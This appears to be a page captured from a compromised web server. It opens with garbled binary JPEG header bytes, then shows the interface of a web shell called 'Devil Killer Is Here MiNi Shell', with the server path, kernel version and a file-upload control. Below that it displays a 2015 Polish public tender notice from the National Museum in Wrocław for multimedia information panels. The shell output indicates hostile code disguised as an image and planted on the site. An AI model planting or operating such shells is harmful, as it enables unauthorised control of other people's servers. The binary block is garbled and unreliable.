JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150910/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150910/236548-N-2015.html

<p class="kh_header"><b>Wrocław: Wykonanie zintegrowanego systemu paneli informacji głównej i pogłębionej w strefie wejściowej Pawilonu Czterech Kopuł, ul. Wystawowa 1, polegającego na dostawie i montażu wystawienniczego sprzętu multimedialnego wraz z obudową i oprogramowaniem oraz wykonaniem i wdrożeniem (tj. zainstalowaniem i uruchomieniem) interaktywnych aplikacji multimedialnych</b><br>
<b>Numer ogłoszenia: 236548 - 2015; data zamieszczenia: 10.09.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Muzeum Narodowe we Wrocławiu , Pl. Powstańców Warszawy 5, 50-153 Wrocław, woj. dolnośląskie, tel. 071 3435643, 3433308, faks 071 3725159.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mnwr.art.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Instytucja kultury.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie zintegrowanego systemu paneli informacji głównej i pogłębionej w strefie wejściowej Pawilonu Czterech Kopuł, ul. Wystawowa 1, polegającego na dostawie i montażu wystawienniczego sprzętu multimedialnego wraz z obudową i oprogramowaniem oraz wykonaniem i wdrożeniem (tj. zainstalowaniem i uruchomieniem) interaktywnych aplikacji multimedialnych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest wykonanie zintegrowanego systemu paneli informacji głównej i pogłębionej w strefie wejściowej w Pawilonie Czterech Kopuł, ul. Wystawowa 1, polegającego na dostawie i montażu wystawienniczego sprzętu multimedialnego wraz z obudową i oprogramowaniem oraz wykonaniem i wdrożeniem (tj. zainstalowaniem i uruchomieniem) interaktywnych aplikacji multimedialnych, w celu zapewnienia osobom zwiedzającym wyczerpującej informacji zarówno o obiekcie, jak i o wystawie sztuki współczesnej oraz wydarzeniach aktualnych i planowanych. 
2. Szczegółowy Opis przedmiotu zamówienia stanowi Projekt wykonawczy (Załącznik nr 8 do SIWZ) i przedmiot zamówienia należy wykonać na jego podstawie. 
3. Przedmiot zamówienia obejmuje w szczególności:
1) wykonanie zamówienia przez personel posiadający niezbędne kwalifikacje, uprawnienia i doświadczenie, w tym w szczególności przez osoby wskazane w wykazie osób przewidzianych do wykonania zamówienia (załącznik nr 8 do niniejszej umowy), spełniające wymagania określone w dziale V ust.1 pkt. 3 SIWZ,
2) wykonanie zabudowy/obudowy sprzętu multimedialnego do do systemu paneli informacji głównej i paneli informacji pogłębionej,
3) dostarczenie, montaż, instalację, uruchomienie sprzętu multimedialnego do systemu paneli informacji głównej i paneli informacji pogłębionej wraz z oprogramowaniem systemowym,
4) zrealizowanie kontentu multimedialnego obejmującego wykonanie, zainstalowanie i uruchomienie wszystkich aplikacji multimedialnych na panelach informacji głównej i panelach informacji pogłębionej, zgodnie z Projektem wykonawczym (załącznik nr 2 do niniejszej umowy),
5) transport do Pawilonu Czterech Kopuł wraz z wniesieniem i rozładowaniem,
6) rozpakowanie i zagospodarowanie zbędnych opakowań zgodnie z wymaganiami ustawy o odpadach,
7) przeprowadzenie szkolenia z zakresu przedmiotu umowy dla personelu Zamawiającego zarówno na poziomie administracyjnym jak i użytkowym; zakres oraz ilość godzin ustalone zostaną przez Zamawiającego; ilość godzin szkolenia nie większa niż 16,
8) zapewnienie gwarancji jakości oraz usługi serwisowej zgodnie z warunkami określonymi w § 10 wzoru umowy (załącznika nr 1),
9) przekazanie na czas nieoznaczony Zamawiającemu praw/licencji do korzystania z oprogramowania systemowego i aplikacji multimedialnych,
10) opracowanie i przekazanie Zamawiającemu niezbędnych instrukcji użytkowania dostarczanego sprzętu, badań  oraz pełnej dokumentacji powykonawczej, zgodnie z Projektem wykonawczym (załącznik nr 2 do niniejszej umowy),
11) poniesienia wszystkich kosztów i opłat związanych z realizacją przedmiotu zamówienia.
4. Wszystkie ewentualne wskazane z nazwy produkty użyte w Projekcie wykonawczym, w przypadkach, gdy jest to uzasadnione specyfiką przedmiotu zamówienia a Zamawiający nie mógł opisać przedmiotu zamówienia za pomocą dostatecznie dokładnych określeń, które pozwalałyby opisać przedmiot  zamówienia w sposób jednoznaczny i wyczerpujący, należy rozumieć jako określenie wymaganych parametrów technicznych lub standardów jakościowych. Oznacza to, iż Zamawiający dopuszcza składanie ofert równoważnych dla nazwanych produktów, z zachowaniem ich wymogów w zakresie jakości i funkcjonalności.
5. Przedstawione parametry przedmiotu zamówienia stanowią minimum techniczne i jakościowe oczekiwane przez Zamawiającego i będą stanowiły podstawę oceny ewentualnych ofert równoważnych. W przypadku przywołania w opisie przedmiotu zamówienia norm, aprobat, specyfikacji technicznych i systemów odniesienia, o których mowa w art.30 ust. 1-3 ustawy Pzp, Zamawiający dopuszcza rozwiązania równoważne opisywanym.
6. Zaoferowany przedmiot zamówienia winien spełniać minimalne wymagania Zamawiającego określone w załączniku nr 8 do SIWZ - Projekcie wykonawczym.
7. Wymagania Zamawiającego odnośnie warunków realizacji zamówienia określone są we wzorze umowy stanowiącej załącznik nr 2 do SIWZ.
8. Zamawiający wymaga, aby Wykonawca załączył do oferty dokumenty przedmiotowe dot. przedmiotu zamówienia: karty katalogowe oferowanego sprzętu multimedialnego potwierdzające wymagane parametry przez Zamawiającego w projekcie wykonawczym; dopuszcza się wydruki ze strony internetowej producenta, na której widoczny jest link do jego strony karty katalogowe, wydruki muszą być poświadczone przez Wykonawcę.
9. Przedmiot zamówienia musi zostać zrealizowany z materiałów zapewnionych przez Wykonawcę.
10. Wykonawca jest obowiązany wskazać w ofercie (wzór formularza- Załącznik nr 2) części zamówienia, których wykonanie zamierza powierzyć podwykonawcom. 
11. Pozostałe warunki  podano w Załączniku nr 1 SIWZ - Wzorze umowy..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 30.20.00.00-1, 30.21.31.00-6, 32.32.20.00-6, 39.15.40.00-6, 51.61.00.00-1, 72.24.30.00-0, 72.21.15.20-0, 79.63.20.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.12.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga złożenia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Na potwierdzenie spełniania tego warunku Zamawiający wymaga złożenia przez Wykonawcę oświadczenia Wykonawcy o spełnieniu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy Pzp według wzoru Załącznika nr 3 do SIWZ. Ocena (weryfikacja) spełnienia przez Wykonawcę przedstawionego powyżej warunku udziału w postępowaniu będzie dokonana na podstawie wymaganego oświadczenia wg formuły: spełnia-nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien wykazać, że należycie wykonał w okresie ostatnich 3 lat przed upływem terminu składania ofert, a w przypadku świadczeń okresowych lub ciągłych również wykonuje, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 3 realizacje muzealne tj. wykonane w instytucji muzealnej, z których:
1) co najmniej dwie realizacje polegają na wykonaniu systemu stanowisk multimedialnych w pomieszczeniach instytucji muzealnych  o  powierzchni nie mniejszej niż 200m2 każda. Każda realizacja obejmuje dostawę sprzętu multimedialnego wraz z oprogramowaniem, jego montaż oraz uruchomienie wraz z przygotowaniem i wdrożeniem autorskiego kontentu multimedialnego, złożonego z minimum 2 aplikacji. Przez sprzęt multimedialny Zamawiający rozumie elektroniczny sprzęt, przystosowany do różnych form przekazu (np. w zakresie dźwięku, wideo, animacji, grafiki), w celu dostarczenia informacji lub rozrywki, w szczególności komputery (w tym przenośne), odtwarzacze wideo, wielkoformatowe monitory, głośniki, oprogramowanie komputerowe multimedialne oraz inne elektroniczne urządzenia podobne do tych, które zostały wyszczególnione w projekcie wykonawczym załączniku nr 8. Przez autorski kontent multimedialny Zamawiający rozumie dostępne poprzez powierzchnie dotykową, interaktywne aplikacje i programy służące do edukacji poprzez zabawę, umożliwiające prezentacje informacji w postaci obrazów, sekwencji wideo, którym towarzyszy narracja i dźwięk oraz  programy  służące do przekazywania informacji  kulturalnych i artystycznych w trzech językach, z wykorzystaniem obrazów i dźwięków. 
oraz
2) co najmniej jedna realizacja polega na wykonaniu zintegrowanego systemu stanowisk multimedialnych w pomieszczeniach instytucji muzealnych  o  wartości zamówienia nie mniejszej niż 500 000,00 zł. netto. Realizacja obejmuje dostawę sprzętu multimedialnego wraz z oprogramowaniem, jego montaż oraz uruchomienie wraz z przygotowaniem i wdrożeniem autorskiego kontentu multimedialnego, złożonego z minimum 3 aplikacji multimedialnych różnych w treści i funkcji. Przez sprzęt multimedialny Zamawiający rozumie elektroniczny sprzęt, przystosowany do różnych form przekazu (np. w zakresie dźwięku, wideo, animacji, grafiki), w celu dostarczenia informacji lub rozrywki, w szczególności komputery (w tym przenośne), odtwarzacze wideo, wielkoformatowe monitory, głośniki, oprogramowanie komputerowe multimedialne oraz inne elektroniczne urządzenia podobne do tych, które zostały wyszczególnione w projekcie wykonawczym załączniku nr 8. Przez autorski kontent multimedialny Zamawiający rozumie dostępne poprzez powierzchnie dotykową, interaktywne aplikacje i programy służące do edukacji poprzez zabawę, umożliwiające prezentacje informacji w postaci obrazów, sekwencji wideo, którym towarzyszy narracja i dźwięk oraz  programy  służące do przekazywania informacji  kulturalnych i artystycznych w trzech językach, z wykorzystaniem obrazów i dźwięków. 
Powyższy warunek udziału dot. posiadania wiedzy i doświadczenia  powinien wynikać z załączonego wykazu wykonanych głównych dostaw - a w przypadku świadczeń okresowych lub ciągłych również wykonywanych - wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy zostały wykonane - wg wzoru załącznika nr 6 SIWZ , oraz powinien być potwierdzony dowodami, że wyżej wymienione dostawy zostały wykonane należycie lub są wykonywane należycie. 
Ocena spełnienia przez Wykonawców warunków udziału w postępowaniu w zakresie wiedzy i doświadczenia będzie dokonana na podstawie wymaganych oświadczeń i dokumentów, opisanych w Dziale VI SIWZ  tj.  oświadczenia o spełnieniu warunków udziału w postępowaniu zgodnie z art. 22 ust 1 ustawy Pzp,  wykazu głównych dostaw (wzór załącznik nr 6 do SIWZ) oraz dowodów wskazujących, że wskazane dostawy zostały  wykonane lub są wykonywane  w sposób należyty, wg formuły: spełnia-nie spełnia.
Zamawiający, w przypadku, gdy przedmiotem zamówienia są świadczenia okresowe i ciągłe dopuszcza nie tylko zamówienia wykonane (tj. zakończone), ale również wykonywane. W takim przypadku część zamówienia już faktycznie wykonana musi spełniać wymogi określone przez Zamawiającego w warunku określonym powyżej.
UWAGA: dla ww. wartości wykazanych przez Wykonawcę w walucie innej niż PLN, Zamawiający przyjmie przelicznik według średniego kursu NBP z dnia wszczęcia niniejszego postępowania. Jeżeli w tym dniu nie będzie opublikowany średni kurs NBP, Zamawiający przyjmie kurs średni z ostatniej tabeli przed wszczęciem postępowania.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Na potwierdzenie spełniania tego warunku Zamawiający wymaga złożenia przez Wykonawcę oświadczenia Wykonawcy o spełnieniu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy Pzp według wzoru Załącznika nr 3 do SIWZ. Ocena (weryfikacja) spełnienia przez Wykonawcę przedstawionego powyżej warunku udziału w postępowaniu będzie dokonana na podstawie wymaganego oświadczenia wg formuły: spełnia-nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, że dysponuje następującymi osobami:
1) Inżynierem elektronikiem - co najmniej 1 osoba, która  legitymuje się wyższym wykształceniem technicznym o specjalizacji elektronicznej  i min. 2 - letnim doświadczeniem oraz brała udział w co najmniej 2 realizacjach polegających na montażu i uruchomieniu interaktywnego systemu multimedialnego.
2) Grafikiem i edytorem kontentu wizualnego na cele implementacji w aplikacjach interaktywnych - minimum 1 osoba posiadająca minimum 3-letnie doświadczenie w ww. zakresie, potwierdzone zrealizowanymi projektami (co najmniej 5 ) z zakresu aplikacji multimedialnych,
3) Programistą - min. 2 osobami posiadającymi wykształcenie wyższe informatyczne i  doświadczenie w tworzeniu wzbogaconych aplikacji multimedialnych (Rich Media Applications) z wykorzystaniem technologii operujących C++, C#, HTML5, AS3, Javascript, Adobe AIR itp., z których każdy wykonał minimum 2 projekty z zakresu aplikacji multimedialnych dla instytucji kultury.
Ocena spełnienia przez Wykonawców warunków udziału w postępowaniu w zakresie dysponowania osobami zdolnymi do wykonania zamówienia będzie dokonana na podstawie wymaganych oświadczeń i dokumentów, opisanych w Dziale VI SIWZ  tj.  oświadczenia o spełnieniu warunków udziału w postępowaniu zgodnie z art. 22 ust 1 ustawy Pzp,  wykazu osób (wzór załącznik nr 7 do SIWZ), wg formuły: spełnia-nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę w wysokości minimum 700 000,00 zł. 
Ocena (weryfikacja) spełnienia przez Wykonawców warunków udziału w postępowaniu w zakresie zdolności ekonomicznej i finansowej będzie dokonana na podstawie wymaganych dokumentów, opisanych w Dziale VI SIWZ (ust.1 pkt. 5) tj. opłaconej polisy, a w przypadku jej braku innego dokumentu potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia w wysokości minimum 700 000,00 zł.wg formuły: spełnia-nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>Wykonawca winien wykazać, że należycie wykonał w okresie ostatnich 3 lat przed upływem terminu składania ofert, a w przypadku świadczeń okresowych lub ciągłych również wykonuje, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 3 realizacje muzealne tj. wykonane w instytucji muzealnej, z których:
1) co najmniej dwie realizacje polegają na wykonaniu systemu stanowisk multimedialnych w pomieszczeniach instytucji muzealnych  o  powierzchni nie mniejszej niż 200m2 każda. Każda realizacja obejmuje dostawę sprzętu multimedialnego wraz z oprogramowaniem, jego montaż oraz uruchomienie wraz z przygotowaniem i wdrożeniem autorskiego kontentu multimedialnego, złożonego z minimum 2 aplikacji. Przez sprzęt multimedialny Zamawiający rozumie elektroniczny sprzęt, przystosowany do różnych form przekazu (np. w zakresie dźwięku, wideo, animacji, grafiki), w celu dostarczenia informacji lub rozrywki, w szczególności komputery (w tym przenośne), odtwarzacze wideo, wielkoformatowe monitory, głośniki, oprogramowanie komputerowe multimedialne oraz inne elektroniczne urządzenia podobne do tych, które zostały wyszczególnione w projekcie wykonawczym załączniku nr 8. Przez autorski kontent multimedialny Zamawiający rozumie dostępne poprzez powierzchnie dotykową, interaktywne aplikacje i programy służące do edukacji poprzez zabawę, umożliwiające prezentacje informacji w postaci obrazów, sekwencji wideo, którym towarzyszy narracja i dźwięk oraz  programy  służące do przekazywania informacji  kulturalnych i artystycznych w trzech językach, z wykorzystaniem obrazów i dźwięków. 
oraz
2) co najmniej jedna realizacja polega na wykonaniu zintegrowanego systemu stanowisk multimedialnych w pomieszczeniach instytucji muzealnych  o  wartości zamówienia nie mniejszej niż 500 000,00 zł. netto. Realizacja obejmuje dostawę sprzętu multimedialnego wraz z oprogramowaniem, jego montaż oraz uruchomienie wraz z przygotowaniem i wdrożeniem autorskiego kontentu multimedialnego, złożonego z minimum 3 aplikacji multimedialnych różnych w treści i funkcji. Przez sprzęt multimedialny Zamawiający rozumie elektroniczny sprzęt, przystosowany do różnych form przekazu (np. w zakresie dźwięku, wideo, animacji, grafiki), w celu dostarczenia informacji lub rozrywki, w szczególności komputery (w tym przenośne), odtwarzacze wideo, wielkoformatowe monitory, głośniki, oprogramowanie komputerowe multimedialne oraz inne elektroniczne urządzenia podobne do tych, które zostały wyszczególnione w projekcie wykonawczym załączniku nr 8. Przez autorski kontent multimedialny Zamawiający rozumie dostępne poprzez powierzchnie dotykową, interaktywne aplikacje i programy służące do edukacji poprzez zabawę, umożliwiające prezentacje informacji w postaci obrazów, sekwencji wideo, którym towarzyszy narracja i dźwięk oraz  programy  służące do przekazywania informacji  kulturalnych i artystycznych w trzech językach, z wykorzystaniem obrazów i dźwięków. 
Powyższy warunek udziału dot. posiadania wiedzy i doświadczenia  powinien wynikać z załączonego wykazu wykonanych głównych dostaw - a w przypadku świadczeń okresowych lub ciągłych również wykonywanych - wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy zostały wykonane - wg wzoru załącznika nr 6 SIWZ , oraz powinien być potwierdzony dowodami, że wyżej wymienione dostawy zostały wykonane należycie lub są wykonywane należycie. 
Ocena spełnienia przez Wykonawców warunków udziału w postępowaniu w zakresie wiedzy i doświadczenia będzie dokonana na podstawie wymaganych oświadczeń i dokumentów, opisanych w Dziale VI SIWZ  tj.  oświadczenia o spełnieniu warunków udziału w postępowaniu zgodnie z art. 22 ust 1 ustawy Pzp,  wykazu głównych dostaw (wzór załącznik nr 6 do SIWZ) oraz dowodów wskazujących, że wskazane dostawy zostały  wykonane lub są wykonywane  w sposób należyty, wg formuły: spełnia-nie spełnia.
Zamawiający, w przypadku, gdy przedmiotem zamówienia są świadczenia okresowe i ciągłe dopuszcza nie tylko zamówienia wykonane (tj. zakończone), ale również wykonywane. W takim przypadku część zamówienia już faktycznie wykonana musi spełniać wymogi określone przez Zamawiającego w warunku określonym powyżej.
UWAGA: dla ww. wartości wykazanych przez Wykonawcę w walucie innej niż PLN, Zamawiający przyjmie przelicznik według średniego kursu NBP z dnia wszczęcia niniejszego postępowania. Jeżeli w tym dniu nie będzie opublikowany średni kurs NBP, Zamawiający przyjmie kurs średni z ostatniej tabeli przed wszczęciem postępowania.
Za główne dostawy uznaje się dostawy niezbędne do wykazania spełniania warunku określonego w dziale V ust. 1 pkt. 2. SIWZ. Dowodami określającymi czy dostawy w w/w wykazie zostały wykonane lub są wykonywane należycie są: 1) Poświadczenia, z tym że w odniesieniu do nadal wykonywanych dostaw poświadczenie powinno być wydane nie wcześniej niż na 3 miesiące przed upływem terminu składania ofert. 2) Oświadczenie Wykonawcy - jeżeli z uzasadnionych przyczyn o obiektywnym charakterze nie jest w stanie uzyskać poświadczenia, o którym mowa powyżej. W przypadku złożenia własnego oświadczenia, przedstawia uzasadnienie braku możliwości uzyskania poświadczenia. 3) W przypadku, gdy Zamawiający tj. Muzeum Narodowe we Wrocławiu jest podmiotem, na rzecz którego usługi wskazane w wykazie, o którym mowa powyżej w pkt. 3), zostały wcześniej wykonane, Wykonawca nie ma obowiązku przedkładania dowodów. 4) W razie konieczności, szczególnie gdy wykaz lub dowody, o których mowa powyżej budzą wątpliwości Zamawiającego lub gdy z poświadczenia lub innego dokumentu wynika, ze zamówienie nie zostało wykonane lub zostało wykonane nienależycie, zamawiający może zwrócić się bezpośrednio do właściwego podmiotu, na rzecz którego roboty budowlane, dostawy lub usługi były lub miały zostać wykonane, o przedłożenie dodatkowych informacji lub dokumentów bezpośrednio Zamawiającemu;;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

